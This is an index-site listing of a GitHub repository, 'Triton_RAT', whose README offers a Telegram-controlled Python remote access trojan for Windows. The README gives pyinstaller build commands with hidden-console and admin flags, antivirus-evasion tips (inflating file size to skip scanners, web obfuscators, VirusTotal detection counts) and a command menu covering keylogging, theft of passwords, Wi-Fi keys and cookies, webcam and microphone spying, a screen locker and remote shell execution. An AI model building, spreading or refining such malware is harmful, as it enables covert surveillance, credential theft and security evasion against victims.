Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/whiteerabbit/triton_rat
Completely free Telegram integrated RAT, Triton_RAT is one of the best RAT's that was written in python. Good luckπ!
https://github.com/whiteerabbit/triton_rat
pc-control python python3 rat remote-access-tool remote-administration-tool remote-administration-trojan remote-administrator-tool remote-control telegram-bot telegram-remote-administration-tool triton windows windows-python windows-python-rat windows-rat
Last synced: 26 days ago
JSON representation
Completely free Telegram integrated RAT, Triton_RAT is one of the best RAT's that was written in python. Good luckπ!
- Host: GitHub
- URL: https://github.com/whiteerabbit/triton_rat
- Owner: WhiteeRabbit
- License: mit
- Created: 2024-05-27T08:33:09.000Z (7 months ago)
- Default Branch: release
- Last Pushed: 2024-11-24T09:49:31.000Z (about 1 month ago)
- Last Synced: 2024-11-24T10:25:13.796Z (about 1 month ago)
- Topics: pc-control, python, python3, rat, remote-access-tool, remote-administration-tool, remote-administration-trojan, remote-administrator-tool, remote-control, telegram-bot, telegram-remote-administration-tool, triton, windows, windows-python, windows-python-rat, windows-rat
- Language: Python
- Homepage:
- Size: 604 KB
- Stars: 6
- Watchers: 1
- Forks: 2
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE.md
Awesome Lists containing this project
README
# Triton_RAT
Triton_Remote_Administration_Tool
Hi π, I'm WhiteeRabbit
I wrote RAT in python that works with telegram!
The best rat that works with telegram!
This tool was created for educational purporses only!
I'm not responding for your action!## :dart: About ##
**With this tool you can control with YOUR pc remotly using telegram**
That you need only hand (2 optional) , exe file that you will get from pyinstaller and telegram account
Let's get started!:
Download python!
Bot Password (when you entering /help or /start) : acd
## :checkered_flag: Starting ##
```bash
# Register account in telegram
# Create bot with botfather# Download this project
# In the old version of Rat we used a site for obfuscation and installed pyinstaller with github repo
# But antiviruses now detect it worse than installin pyinstaller via pip
# and Virustotal will show less detection than obfuscation
# But I wouldn't be me if i didn't find an obfuscation method
# There are still decetions , but at least we make fewer of them.$ Download pyinstaller 5.13.0 or older versions: pip install pyinstaller==5.13.0
# if you downloaded pyinstaller from pip like pip install pyinstaller
# Delete that# also i'm recomending you to install and upgrade setuptools and pip
$ pip install --upgrade setuptools pip
# if you don't do this, problems may arise# Download requiremets.txt
$ pip install -r requirements.txt# change bot api in python file to your own bot
$ bot = telebot.TeleBot('your api token')# !MAIN STEP! obfuscation will help to deceive antiviruses
$ For obfuscation we will use my python program which you can find at the link: https://github.com/WhiteeRabbit/fake_file_resizer
$ https://github.com/WhiteeRabbit/fake_file_resizer
# We can increase the file size through this appalication so that antiviruses skip rat beacuse of size.
# For example if you write the size 620 mb , Antivirus Eset will skip that,and it will less detetct.
# Download fake_file_resizer, then run:
$ python fake_file_resizer.py
# Enter your exe, then enter output file name after that write output file size in mb(don't write mb).
# Without manipulations with fake_file_resizer (no obfuscated) it shows 11 detects in virustotal, but with my ip is shows only 4 detects
# Today this is the best method of obfuscation
# If you want to obfuscate CODE that I'm recomending to you these 2 websites:
# First (6 detection):https://pyob.oxyry.com/ (use this after minifying the code ,because code's too long)
# Second (5 detection): https://python-minifier.com/
# These are the best method if you don't want to use fake_file_resizer
# Don't worry it detects by not popular antiviruses
# First, copy the full code of Triton_RAT_Release.py then paste it in second link
# After that, paste minified code in Triton_RAT_Release.py, then build it with pyinstallerβ¬οΈ# After downloading pyinstaller run:
$ pyinstaller --onefile --noconsole --uac-admin --hidden-import telebot --hidden-import pyautogui --hidden-import cv2 --hidden-import json --hidden-import base64 --hidden-import sqlite3 --hidden-import win32crypt --hidden-import Cryptodome.Cipher.AES --hidden-import shutil --hidden-import datetime --hidden-import numpy --hidden-import pyaudio --hidden-import wave --hidden-import random --hidden-import browser_cookie3 --hidden-import pyttsx3 --hidden-import pynput Triton_Rat_Release.py# Some people says that you can decrease detections count with adding --key "testname" attribute when building it with pyinstaller
# But, it didn't worked for me...# wait for building exe
# !BOT PASSWORD IS: acd$ run exe and bot started!
```
If you want to avoid scanning some antiviruses you can make thatβ¬οΈ
More online scanners and antiviruses also most popular online antivirus scanner virustotal's max allowed file size is 650 MB.
Antiviruses, seeing the file size that it is large, will stupidly not check it! and you will be cool man.I wrote a python app that will help you to change your file's size for ex: from 100 mb to 750 mb.
With help of this app you can make your file's size as you wanted!(it works on all systems)
Download app: https://github.com/WhiteeRabbit/fake_file_resizer/
Download here: https://github.com/WhiteeRabbit/fake_file_resizer/
## You can use:
**π οΈ System Commands**
- βοΈ **/start** - Start the program
- βοΈ **/help** - Help with commands
- π **/addstartup** - Add autostart
- β¨οΈ **/keylogger** - Start keylogger
- β **/stopkeylogger** - Stop keylogger
- π **/run [filepath]** - Run file
- π§π»βπ» **/users** - Show users on the PC
- π₯οΈ **/whoami** - Show the name of the PC
- π **/tasklist** - Show running tasks
- 𧨠**/taskkill [task]** - Kill the entered task
- π€ **/sleep** - Put the PC to sleep
- π **/shutdown** - Shutdown the PC
- π **/restart** - Restart the PC
- π₯ **/altf4** - ALT + F4 (google it to find what it means)
- π£ **/cmdbomb** - Opens 10 CMD windows
- βοΈ **/msg [type] [title] [text]** - Displays a messagebox
*/msg types(info; warning; error; question; default or 0)*
** for ex: /msg error testtitle testtext **
## **π Security & Privacy**
- π **/passwords** - Show saved passwords on the PC
- πͺ **/robloxcookie** - Show Roblox cookies
- 𧱠**/wallpaper** - Change the desktop wallpaper
- πͺ¦ **/disabletaskmgr** - Disable Task Manager
- π **/enabletaskmgr** - Enable Task Manager
- β’οΈ **/winblocker** - My own winlocker
- β£οΈ **/winblocker2** - If winblocker doesn't work
## **π± Device Management**
- π· **/screenshot** - Take a screenshot
- ποΈ **/mic [time in seconds]** - Record the PC's microphone
- πΉ **/webscreen** - Get a screenshot from the camera
- π¦ **/webcam** - Get webcam video
- π₯ **/screenrecord** - Record the screen
- π« **/block** - Block user input (mouse and keyboard)
- β **/unblock** - Unblock user input (mouse and keyboard)
- π±οΈ **/mousemesstart** - Start mouse messing
- π **/mousemesstop** - Stop mouse messing
- πͺ€ **/mousekill** - Disable the mouse
- π **/mousestop** - Enable the mouse
- π±οΈ **/mousemove [x] [y]** - Enter x and y cordinates and mouse's pointer goes there
- π **/mouseclick** - Make click with mouse
- π **/fullvolume** - Set volume to full
- π **/volumeplus** - Increase volume by 10
- π **/volumeminus** - Decrease volume by 10
- ποΈ **/rotate** - Rotate monitor +90 degrees (for exmpl: entering 2 times rotates it 180 degrees)
- πͺ **/maximize** - Maximize active window
- πͺ **/minimize** - Minimize active window
## **π Networking**
- π **/wifilist** - Show saved Wi-Fi networks
- π **/wifipass [accesspoint]** - Show the password of a saved Wi-Fi network
- π **/chrome [website URL]** - Open a website in Chrome
- π **/edge [website URL]** - Open a website in Edge
- π **/firefox [website URL]** - Open a website in Firefox
## **πΆ Multimedia**
- π¬ππ» **/textspech [your text]** - Speak the text aloud
- π΅ **/playsound [file path]** - Play a sound file (first upload the file using **/upload**)
- π **/download [file path]** - Download a file from the PC
- ποΈ **/upload** - Upload a file to the PC
- π **/clipboard** - Show clipboard content
- π **/changeclipboard [testcahnge]** - Change clipboard content
## **βοΈ Advanced Operations**
- π‘οΈ **/e [command]** - Execute shell commands (shortcut)
- πΉ **/ex [command]** - Execute shell commands with long responses
- π« **/execute** - Execute shell commands my alternative of netcat in linux (works commands such as cd ,cd.. and etc...)
- *commands like cd ,cd .. and others work excellent in the /e , /ex and /execute commands.*
- π **/metadata [filepath]** - Displays the file's metadata information
- β¨οΈ **/keytype [key]** - Enter a text and that text will written with pc's keyboard
- β¨οΈ **/keypress [key]** - Press a specific key on the keyboard
- β¨οΈ **/keypresstwo [key1] [key2]** - Press two keys simultaneously
- β¨οΈ **/keypressthree [key1] [key2] [key3]** - Press three keys simultaneously
- πΆοΈ **/hide** - Hide your app
- π **/unhide** - Unhide your app
## **π₯οΈ System Information**
- πͺͺ **/info** - Show PC information (IP, location, country, city)
- π **/pcinfo** - Info about PC's OS, system, CPU, Windows version, BIOS, etc...
- π» **/shortinfo** - Show's less but, mostly the necessary information about pc
- π οΈ **/apps** - Show installed apps on the PC
- π **/batteryinfo** - Show info about battery
## **EXAMPLES:**
- π **/examples** - Shows examples
## **π±π€³π»My Socials:ππ²**
- π **/github** - [**My github**]## Antivirus check (with help of fake_file_resizer)π ##
![Π‘Π½ΠΈΠΌΠΎΠΊ ΡΠΊΡΠ°Π½Π° (24)](https://github.com/user-attachments/assets/715a1384-30ae-43ea-bbb2-3d4b66cb8cee)
## Antivirus check (with help of second obfuscation(minifying) method (i wrote about thatβ¬οΈ)) ##
![Π‘Π½ΠΈΠΌΠΎΠΊ ΡΠΊΡΠ°Π½Π° (26)](https://github.com/user-attachments/assets/1e5020f4-207a-4125-81be-a98371923f02)## Triton_Rat V2 update features: ##
- **New interface and desing**
- **Added more than 10 new functions(also keylogger,metadata ,pc info and etc...)**
- **Added: minimaze ,maximize ,rotate monitor ,metadata ,keylogger, block/unblock user input ,better information about pc (from bios to battery) and etc... βΊοΈ**
- **Fixed bugs**## :memo: License ##
This project is licensed under the MIT License. For more details, please refer to the [LICENSE](LICENSE.md) file.